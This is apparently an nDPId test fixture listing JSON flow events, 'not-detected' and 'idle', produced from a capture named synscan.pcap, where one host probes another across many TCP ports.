+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 